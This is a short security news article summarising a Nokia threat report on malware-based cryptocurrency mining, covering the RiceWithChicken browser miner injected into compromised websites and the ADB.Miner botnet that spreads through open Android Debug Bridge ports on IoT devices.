Report: malware based cryptocurrency mining is on the rise

According to the latest report from Nokia Threat Intelligence Lab, malware based cryptocurrency mining has expanded from targeting high end servers with specializes processors to targeting IoT devices, smartphones and even browsers.  Further, the company has stressed the importance of this issue as cryptocurrency  mining will continue its upward trend in years to come.

Competing algorithms

The Bitcoin proof-of-work algorithm is not very friendly to regular processing technology. It works much faster on specialized ASICs, FPGAs and GPUs. Because of this, economic Bitcoin mining is usually done on specialized equipment in locations where cheap electricity is available. Competing technologies such as Monero, use algorithms that can be run economically on regular computer hardware. This has led to a situation where cryptocurrency mining is being conducted in IoT bots, mobile phones and even in web browsers. On its own, a single computing device is not powerful enough to make any money, but when combined in a botnet it becomes financially viable.

Mining in the browser

According to the security report, malicious code named RiceWithChicken is JavaScript that does cryptocurrency mining in the browser. RiceWithChicken is a modified version of CoinHive – a commercial Monero cryptocurrency mining service that offers to help monetize websites for their owners. While CoinHive clearly advertises its presence on websites, RiceWithChicken performs its mining operations without the permission of the website owner, nor the knowledge of the visitors to that website.

Links to the RiceWithChicken coin miner have been placed onto many compromised websites, typically in a poorly secured JavaScript file. In many cases, multiple copies of this link are injected into the same file, likely due to the usage of automated toolsets by those responsible. In the example below, a copy of a jQuery library was the scene of the code injection.

The user surfing to the compromised website will not be aware of this activity going on in the background. They will be able to continue to browse the site’s content without issues, other than experiencing significantly poorer performance on their device. Because this is a browser-based threat, the impact will be felt regardless of what type of device is being used to browse to the site. The cryptocurrency miner will continue running until the browser is shut down. On a mobile phone, the browser usually continues to run in the background when the user switches to another task, so the coin-miner will continue consuming CPU and draining the battery for some time.

Mining in IoT botnets

A number of cryptocurrency miners are now targeting IoT devices. An example of this is the ADB.Miner bot that exploits Android based IoT devices that have an open Android Debug Bridge (ADB) port. ADB is used by developers to debug Android applications and is not normally left open on production devices. However, apparently some Android based smart TVs, set-top-boxes, tablets and other Android based IoT devices have been deployed accidentally with this debug port open. This effectively gives the attacker shell access over the network. The coin mining software is loaded via a shell script and the device becomes part of ADB. Miner botnet. In not only starts to mine coins 24/7, but like other Mirai based bots, it also scans the local network and the internet looking for other victims.

Comments

Report: malware based cryptocurrency mining is on the rise
Share this